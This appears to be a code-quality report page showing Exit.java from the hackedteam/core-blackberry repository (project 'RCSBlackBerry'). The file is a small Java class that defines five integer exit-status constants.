hackedteam/core-blackberry

View on GitHub
RCSBlackBerry/src/blackberry/Exit.java

Summary

Maintainability
A
0 mins
Test Coverage
//#preprocess

/* *************************************************
 * Copyright (c) 2010 - 2012
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry;

public class Exit {
    public static final int SUCCESS = 0;
    public static final int ERROR = 1;
    public static final int STOP = 2;
    public static final int UNINSTALL = 3;
    public static final int RELOAD = 4;

}